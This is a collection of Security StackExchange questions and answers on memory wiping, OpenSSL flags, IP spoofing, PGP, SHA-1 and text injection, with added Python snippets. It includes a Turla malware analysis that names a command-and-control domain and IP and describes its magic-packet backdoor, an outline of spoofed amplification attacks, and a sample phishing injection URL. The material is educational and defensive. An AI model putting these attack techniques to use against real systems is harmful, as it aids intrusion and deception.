74,280 | Is it good secure programming practice to overwrite sensitive data stored in a variable before it is deleted (or goes out of scope)? My thought is that it would prevent a hacker from being able to read any latent data in RAM due to data-remanence. Would there be any added security in overwriting it several times? Here is a small example of what I am talking about, in C++ (with comments included). void doSecret()
{
// The secret you want to protect (probably best not to have it hardcoded like this)
int mySecret = 12345;
// Do whatever you do with the number
...
// **Clear out the memory of mySecret by writing over it**
mySecret = 111111;
mySecret = 0;
// Maybe repeat a few times in a loop
} One thought is, if this does actually add security, it would be nice if the compiler automatically added the instructions to do this (perhaps by default, or perhaps by telling the compiler to do it when deleting variables). This question was featured as an Information Security Question of the Week . Read the Dec 12 2014 blog entry for more details or submit your own Question of the Week . | Yes that is a good idea to overwrite then delete/release the value. Do not assume that all you have to do is "overwrite the data" or let it fall out of scope for the GC to handle, because each language interacts with the hardware differently. When securing a variable you might need to think about: encryption (in case of memory dumps or page caching) pinning in memory ability to mark as read-only (to prevent any further modifications) safe construction by NOT allowing a constant string to be passed in optimizing compilers (see note in linked article re: ZeroMemory macro) The actual implementation of "erasing" depends on the language and platform. Research the language you're using and see if it's possible to code securely. Why is this a good idea? Crashdumps, and anything that contains the heap could contain your sensitive data. Consider using the following when securing your in-memory data SecureZeroMemory .NET SecureString C++ Template Please refer to StackOverflow for per-language implementation guides. You should be aware that even when using vendor guidance (MSFT in this case) it is still possible to dump the contents of SecureString , and may have specific usage guidelines for high security scenarios. | {
"source": [
"https://security.stackexchange.com/questions/74280",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47692/"
]
} |
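(Following the answer to 74,280 above — "the actual implementation of erasing depends on the language" — here is what the idea looks like in Python, where str objects are immutable and cannot be wiped: keep the secret in a mutable bytearray and overwrite that buffer when done. A hedged sketch only; it cannot undo copies the interpreter may already have made, and an optimizer or garbage collector can still undermine schemes like this.)

# Sketch: hold a secret in a mutable buffer and zero it in place after use.
import ctypes

def wipe(buf):
    # ctypes.memset overwrites the bytearray's actual memory; simply rebinding the
    # name would leave the old object (and the secret) lying around on the heap.
    view = (ctypes.c_char * len(buf)).from_buffer(buf)
    ctypes.memset(ctypes.addressof(view), 0, len(buf))

secret = bytearray(b"correct horse battery staple")
try:
    pass  # ... use the secret ...
finally:
    wipe(secret)
    assert all(b == 0 for b in secret)
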
74,345 | Is it possible to provide a subjectAltName-Extension to the openssl req module directly on the command line? I know it's possible via a openssl.cnf file, but that's not really elegant for batch-creation of CSRs. | As of OpenSSL 1.1.1, providing subjectAltName directly on command line becomes much easier, with the introduction of the -addext flag to openssl req (via this commit ). The commit adds an example to the openssl req man page : Example of giving the most common attributes (subject and extensions)
on the command line:
openssl req -new -subj "/C=GB/CN=foo" \
-addext "subjectAltName = DNS:foo.co.uk" \
-addext "certificatePolicies = 1.2.3.4" \
-newkey rsa:2048 -keyout key.pem -out req.pem This has been merged into the master branch of the openssl command on Github , and as of April 18 2018 can be installed via a git pull + compile (or via Homebrew if on OS X: brew install --devel [email protected] ). Note that if you have set the config attribute "req_extensions" at section "[req]" in openssl.cfg, it will ignore the command-line parameter | {
"source": [
"https://security.stackexchange.com/questions/74345",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47847/"
]
} |
74,346 | For homework, I coded a TCP packet with raw sockets . So I was also able to change the source IP address to whatever I wanted. So why can't someone just make a program, which sends millions of these packets ( DDoS ) with a different source IP address? Wouldn't he/she be "secure" and no one could trace him/her? Further questions: Couldn't you just implement this in this DDoS program called LOIC ? So there wouldn't be anyone busted using it. What do the routers log about me (sender)? Could the police trace me with these logs? | You are correct that this is possible. There are problems with the plan though: The network you are leaving can filter to drop outgoing packets that do not have a source IP from within their network. DDoS ( Distributed Denial of Service) is based around idea that many boxes target a single one, overloading the target's ability to handle the data. Your single consumer hardware is unable to produce the output alone to overload a target. Source IP address spoofing is used in some denial of service attacks, such as sending small requests for large amounts of data to many servers where the servers will reply to the spoofed target. See Reflected/spoofed attack on Wikipedia or last year's NTP Amplification Attack from the US CERT. Usually TCP doesn't benefit from address spoofing due to the three-way handshake . It is more useful with TCP to perform session hijacking . | {
"source": [
"https://security.stackexchange.com/questions/74346",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61974/"
]
} |
74,524 | For the last 2 days, +/- every 15 minutes, someone is attempting to sign-in to my online email account. When I verify recent activity, the IP address (and the corresponding country) is different for each attempt. I assume it is the same person (bot) attempting to log in from the same geographical location. How does the hacker manage to fake a different IP address? (Is he using an anonymity software like TOR?) | TOR, VPN, bots, proxies, you name it.. The source IP is not "spoofed" per se... it's the real deal. If someone really spoofed a source IP, they couldn't establish a TCP connection or receive any replies. The source IP spoofing method is more useful over UDP when launching an amplification attack to a victim/spoofed IP. | {
"source": [
"https://security.stackexchange.com/questions/74524",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/62122/"
]
} |
74,608 | spammimic.com offers a service that 'encrypts' your mail as 'spam', the rationale being that all mail services automatically filter out spam, and so if you're wanting to communicate with someone without an eavesdropper noticing, disguising your message as spam will do this. Is there any evidence that this would actually work though? In order for your message to get through, it would have to be sufficiently not like spam in order not to be deleted outright. Assuming you send it from your own account, headers etc. will be intact, and isn't this the first thing that spam filters check? Wouldn't it be the first thing the eavesdropper would check too? In short: Dear Friend , Especially for you - this red-hot announcement ! If you no longer wish to receive our publications simply reply with a Subject: of "REMOVE" and you will immediately be removed from our club . This mail is being sent in compliance with Senate bill 1621 ; Title 1 ; Section 309 . This is NOT unsolicited bulk mail . Why work for somebody else when you can become rich within 61 DAYS ! Have you ever noticed nobody is getting any younger and people are much more likely to BUY with a credit card than cash . Well, now is your chance to capitalize on this ! We will help you SELL MORE & use credit cards on your website . You are guaranteed to succeed because we take all the risk . But don't believe us ! Mrs Ames who resides in Delaware tried us and says "I've been poor and I've been rich - rich is better" ! We are licensed to operate in all states ! Do not go to sleep without ordering . Sign up a friend and your friend will be rich too ! Cheers . Dear Friend ; Especially for you - this cutting-edge intelligence ! This is a one time mailing there is no need to request removal if you won't want any more ! This mail is being sent in compliance with Senate bill 2416 , Title 3 ; Section 302 ! This is not a get rich scheme ! Why work for somebody else when you can become rich within 71 weeks ! Have you ever noticed society seems to be moving faster and faster and most everyone has a cellphone ! Well, now is your chance to capitalize on this ! We will help you SELL MORE and increase customer response by 170% ! You are guaranteed to succeed because we take all the risk . But don't believe us . Mr Jones of Georgia tried us and says "Now I'm rich many more things are possible" ! This offer is 100% legal ! So make yourself rich now by ordering immediately ! Sign up a friend and you'll get a discount of 60% . Best regards ! | It would help if you elaborated on if you are defending from a targeted attack or just being cautious, and what vector the potential adversary would be using to eavesdrop. That being said, the method you are referring to is called ' security through obscurity ', and is "… discouraged and not recommended by standards bodies." I would say that is putting it nicely. Security though obscurity is very BAD (on it's own). Try watching this video from Def Con 21 , told from the perspective of forensic investigators. They show several examples of why security through obscurity is a bad idea. You can also get an understanding of the capabilities of the tools used by forensic investigators. | {
"source": [
"https://security.stackexchange.com/questions/74608",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1953/"
]
} |
74,623 | Is renaming folders & files and changing file types an effective solution for file security of a PC? I am an application programmer and have an extensive background in it. I have written a robust program that renames folders and files and also changes file types. It does not compromise the integrity of the file, although I have been able to do that as well and change it back. I am just wondering, how secure this is. I know that if for example I change: test.jpeg to test.txt , if someone were to simply change it back, my security is compromised. I've obviously made it more complex than this, but is there a loophole? Is there a way to check PC logs for file changes or some other way a pro would decipher this. As I said, my program that ' encrypts ' these files is very robust, I highly doubt anyone but myself would be able to understand / compromise it. Some of the security vulnerabilities I do know about: A user could simply rename all of the files and thus have beaten the
security To solve this I would add a header line to files so that even if the file was renamed it could not be read by the program. For images a user could check the system thumbnails To counter this I clear all temporary files upon encrypting files. PC backups that contain the non-encrypted file Know and control your backups. Any other ways to crack this security? A further note to this: this security solution was thought of after having the CryptoVirus attack my server. It was nearly impossible to reverse the changes that that virus made. I thought why not apply the same methodology to my file security. Another note is that I am building upon Windows 7, with thoughts of expanding to other Windows platforms. | What you are doing is no kind of encryption, it is just obfuscation. It relies on security by obscurity . It may be enough to hide your files from an amateur/casual observer, but anyone analyzing the files in a hex editor is going to be able to rebuild and access them. Effectively your method is about equal in complexity to attempting file undeletion, for which there are a host of tools available to anyone versed in digital forensics. By contrast, the CryptoLocker malware you mentioned uses valid public-key cryptography , which is probably a method you should consider. | {
"source": [
"https://security.stackexchange.com/questions/74623",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/62195/"
]
} |
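(For contrast with the renaming scheme in 74,623 above, this is roughly what real encryption looks like with an off-the-shelf library — the cryptography package's Fernet recipe, which is symmetric and authenticated. Ransomware such as CryptoLocker layers public-key wrapping on top of this idea; that part is out of scope here, and the file names are placeholders.)

# Sketch: encrypt and decrypt a file with authenticated symmetric encryption (Fernet).
from cryptography.fernet import Fernet

key = Fernet.generate_key()      # keep this key safe and separate from the files
f = Fernet(key)

with open("test.jpeg", "rb") as src:             # placeholder file name
    token = f.encrypt(src.read())
with open("test.jpeg.enc", "wb") as dst:
    dst.write(token)

# Later, with the same key:
with open("test.jpeg.enc", "rb") as src:
    recovered = f.decrypt(src.read())            # raises InvalidToken if the file was tampered with
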
74,695 | There are several articles describing the newly discovered Linux-based Turla trojan. But basically, all these articles repeat the same, very limited, information.
Can anybody provide more details, such as: How do linux machines get infected Is there any privilege escalation involved, or is the whole thing only happening under the infected user (i.e. uid 1000) Where does the malware code "live" on the infected machine plus any other interesting details | TURLA is the final stage of a large and sophisticated family of malware. There have been known Windows versions since at least 2010. This 40 page presentation is the most comprehensive resource I have seen, for either platform. TURLA - development & operations Some Windows Highlights Stage 0: attack stage - infection vector Stage 1: reconnaissance stage - initial backdoor Stage 2: lateral movements Stage 3: access established stage - TURLA deployed On each stage they can quit if they lose interest in target Stage 0: Injection Vectors Spear Phishing ( CVE-2013-3346 )( CVE-2013-5065 ) Watering Holes [Adobe Update social engineering / Java exploits ( CVE-2012-1723 ), Adobe Flash exploits or Internet Explorer 6,7,8 exploits] Third party supplier compromise Stage 1: Reconaissance Stage Initial backdoor - WipBot/Epic/TavDig WipBot is a combination of a zero-day and a CVE-2013-3346 exploit Exports functions with same names as TURLA. No other similarities Breaks debugging and most malware sandboxes Process hops several times, wipes its own PE section Further described in Kaspersky Lab report Stage 2: Lateral Movements Refine C&C Further penetrate network Utilize new backdoor Gets Domain Admin credentials Stage 3: Turla Dropped on select machines for long-term compromise Machines can be compromised for years without detection Other Resources The 'Penguin Turla' - Kaspersky Lab (linux specific details) Symantec Report - Turla Linux Highlights Turla module written in C/C++ Based on cd00r Executable is statically linked against multiple libraries Its functionality includes hidden network communications, arbitrary remote command execution, and remote management Much of its code is based on public sources Cannot be detected with netstat Does not require root access Linux Executable Characteristics ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, stripped Linux Statically Linked Libraries glibc2.3.2 - the GNU C library openssl v0.9.6 - an older OpenSSL library libpcap - tcpdump's network capture library Linux C&C Details First stage C&C is hardcoded. Known activity @ news-bbc.podzone[.]org pDNS IP: 80.248.65.183 Linux Startup/Execution Details Process requires two parameters: ID (a numeric value used as a part of the "magic packet for authentication") and an existing network interface name The parameters can be inputted two different ways: from STDIN, or from dropper a launching the sample After the ID and interface name are entered and the process launched, the backdoor's process PID is returned Linux Magic Packet Statically links PCAP libraries Gets raw socket, applies filter, captures packets Checks for an ACK number in the TCP header, or the second byte from the UDP packet body If condition is met, execution jumps to packet payload contents and creates regular socket Backdoor uses new socket to connect to source address of Magic Packets Backdoor reports its own PID and IP, waits to receive commands Arriving commands are executed with a "/bin/sh -c " script Final Notes Everything regarding the linux version was from the Kaspersky report. Unfortunately, detecting seems to be very difficult at this point. 
"Although Linux variants from the Turla framework were known to exist, we haven't seen any in the wild yet." - Kaspersky Lab | {
"source": [
"https://security.stackexchange.com/questions/74695",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28654/"
]
} |
74,728 | I've been learning about PGP, and I asked myself, "Why?" For example, if I'm using https://mail.google.com , then what benefit would adding PGP offer that would justify it being used? I can understand that it's possible for an encryption method to become compromised, and it could be seen as a means to avoid disaster if a backdoor to SSL/TLS was released. PGP is also more decentralized, which could be attractive to some. | SSL/TLS protects the email from tampering or eavesdropping as it transits between your computer and Google's server, and possibly during further relays to the eventual recipient. And that's all it does. PGP does far more. If you're sending a signed email, the recipient can verify that the email was sent by you, and that it was not tampered with at any point between when you wrote it and when they received it. If you're sending an encrypted email, you know that nobody but the intended recipient can read it -- not Google, not the NSA, nobody. That's why it's called " End to End Encryption ". However, the email metadata (from, to, subject, timestamps) is still sent in the clear, and PGP can't help with that. So in general, it's best to send PGP-encrypted emails via TLS-secured connections. | {
"source": [
"https://security.stackexchange.com/questions/74728",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/62291/"
]
} |
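(A small sketch of the "end to end" point in the answer to 74,728 above, using the python-gnupg wrapper around a local GnuPG installation: the body is encrypted before the mail provider ever sees it, while TLS still protects the hop to the server. The recipient address is a placeholder, and the headers remain visible as the answer notes.)

# Sketch: encrypt a message body with python-gnupg before handing it to your mail code.
import gnupg

gpg = gnupg.GPG()   # uses your existing GnuPG keyring

body = "Meet at the usual place at 9."
result = gpg.encrypt(body, "[email protected]")   # placeholder recipient; add sign="YOUR_KEY_ID" to sign too
if not result.ok:
    raise RuntimeError(result.status)

armored = str(result)   # ASCII-armored ciphertext; only the recipient's private key can read it
# hand `armored` to smtplib or your mail client -- From/To/Subject still travel in the clear
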
75,817 | A strong cryptographic hash makes collisions unlikely. Many cryptographic protocols build on that fact. But Git is using SHA-1 hashes as object identifiers. So there are a lot of already computed hashes out there in the public Git repositories of the web, along with details on how to reproduce them. Is there some known attack on some protocol where this might be leveraged? Something like “well, I can do something evil if I replace this unknown plain text with some other plain text with the same SHA-1 hash, so instead of computing a collision I'll google for it.” Of course, the space of all hashes is still far from covered by Git commits, but nevertheless, I'd guess all the Git commits out there might amount to quite some CPU hours of computing SHA-1 hashes. I'm not sure whether that guess is justified, though. As far as I can see, such an attack would only work if the hash is visible, the plain text from which it was generated is not, but some cypher text generated from is, and a different text can be encrypted as well. So this looks like it might apply to some public key based protocols, where you can encrypt but not decrypt. Furthermore, you don't have control over the colliding plain text, so obvious things like putting your own name as the beneficiary of some financial transaction won't work. Are there any scenarios where such a crowd-sourced hash collision could cause serious trouble with non-negligible probability? | Is Git crowdsourcing the production of SHA-1 preimages ? Not to any meaningful degree. Github doesn't say how many commits it's tracking, but it's probably not more than a few billion. For comparison, there are 1,461,501,637,330,902,918,203,684,832,716,283,019,655,932,542,976 possible SHA-1 hashes, so the odds of finding a plaintext matching an arbitrary hash of interest are effectively non-existent. | {
"source": [
"https://security.stackexchange.com/questions/75817",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/37740/"
]
} |
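(The arithmetic behind the answer to 75,817 above, with ten billion used as a deliberately generous guess for the number of hashes published through public Git repositories.)

# Back-of-the-envelope: what fraction of the SHA-1 space do all public Git commits cover?
total_hashes = 2 ** 160       # every possible SHA-1 output
known_commits = 10 ** 10      # generous assumption for publicly visible commit hashes

print(f"possible hashes: {total_hashes:.3e}")                     # ~1.462e+48
print(f"chance a given hash is already out there: {known_commits / total_hashes:.3e}")  # ~6.8e-39
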
75,958 | Someone reported a bug on my site that I don't really consider an issue. My site has a URL akin to this: www.site.com/ajax/ads.asp?callback=[text injection] So the file type is application/json, and I don't see how that can affect the security of the site. His point of contention was that it can bypass crossdomain.xml if someone visits a page with this in it: <script src=www.site.com/ajax/ads.asp?callback=[some javascript]></script> I did a search for this but couldn't really find any information that says what he is saying is true. I need someone to tell me how serious this is, and whether I really need to go through my scripts to fix every instance of this bug. | Plaintext injection is an issue. Say you have a page template that looks like this: Hi <name>,
Blah blah blah. And you can inject from the URL. An attacker can construct an email with a link to www.example.com/ajax/ads.asp?name=Foo%2C+you+have+the+wrong+version+Flash+plugin%2C+our+company+policy+requires+that+you+use+version+vul.ne.rabl.e.%0D%0A%0D%0AHi%020Foo (which could also be minified). This will make your page look like: Hi Foo, you have the wrong version Flash plugin, our company policy requires that you use version vul.ne.rabl.e. Hi Foo, Blah blah blah. The message looks like it comes from your site, and since your users trusts your site, they will likely believe the instructions that "you" have given. | {
"source": [
"https://security.stackexchange.com/questions/75958",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10608/"
]
} |
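(A toy reproduction of the answer to 75,958 above: even plain text reflected into a page becomes a phishing aid, and the generic remedy for callback-style parameters is a strict allow-list. The template and validator are invented for the demo.)

# Toy demo: an unvalidated parameter reflected into a template, and a strict validator as the fix.
import re

TEMPLATE = "Hi {name},\n\nBlah blah blah."

def render(name):
    return TEMPLATE.format(name=name)

injected = ("Foo, you have the wrong version Flash plugin, our company policy "
            "requires that you use version vul.ne.rabl.e.\r\n\r\nHi Foo")
print(render(injected))   # the attacker's sentence now reads as if the site itself wrote it

def safe_callback(value):
    # JSONP-style callback names never need more than this character set.
    if not re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]{0,63}", value):
        raise ValueError("invalid callback name")
    return value
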
75,981 | I was using my laptop at a Starbucks on a table, and a person was using a laptop on the same table across from me, a couple seats to my side. He flicked some plastic thing across the table towards my laptop. What really freaked me out was he then actually flicked it again further to get it right in front of my laptop, behind my screen. The plastic thing was ring-shaped with a metal part on one end, which looked like the 30-pin iPhone charger. I've attached the basic shape. Does anyone think they might know what the plastic dongle could be and/or have any information that would suggest the person was trying to do something malicious? | No, you are just being paranoid. You were probably already connected to him over WiFi. There are many attacks he could have run this way without additional devices. Also if he would have wanted to hack you, he would not have thrown his strange hacking device in your face. He would have hidden it below the table. Side note: I feel like most of the people saying they have been hacked are only paranoid. While most of the people who actually have been hacked do not notice it at all. Also see VolleyJosh answer about the device. | {
"source": [
"https://security.stackexchange.com/questions/75981",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/63504/"
]
} |
76,189 | I am cleaning up the certificate stores on my Windows machines, and considering which certificates I should keep, and which ones I should delete. Why does a fresh install of Windows Server 2012 R2 come with certificates such as these: Considering that these certificates expired back when I was in high school, what could they possibly be good for? Why would they still be included with the operating system 15 years later? | In essence, these certificates are necessary and required for backward compatibility with XP and Server 2003. If anything was signed with these certificates, even if they're expired now , your server needs the cert trusted in order to trust the thing that the cert signed. Source: http://support.microsoft.com/kb/293781 Some certificates that are listed in the previous tables have expired. However, these certificates are necessary for backward compatibility. Even if there is an expired trusted root certificate, anything that was signed by using that certificate before the expiration date requires that the trusted root certificate be validated. As long as expired certificates are not revoked, they can be used to validate anything that was signed before their expiration. | {
"source": [
"https://security.stackexchange.com/questions/76189",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/15499/"
]
} |
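(If you want to see which roots in your own store are expired before acting on the answer to 76,189 above, Python can enumerate the Windows ROOT store directly. ssl.enum_certificates is Windows-only, and a reasonably recent version of the cryptography package is assumed for parsing the DER blobs.)

# Sketch (Windows only): list expired certificates in the local machine's ROOT store.
import ssl
from datetime import datetime
from cryptography import x509

now = datetime.utcnow()
for der, encoding, trust in ssl.enum_certificates("ROOT"):
    if encoding != "x509_asn":
        continue
    cert = x509.load_der_x509_certificate(der)
    if cert.not_valid_after < now:
        print("expired", cert.not_valid_after.date(), cert.subject.rfc4514_string())
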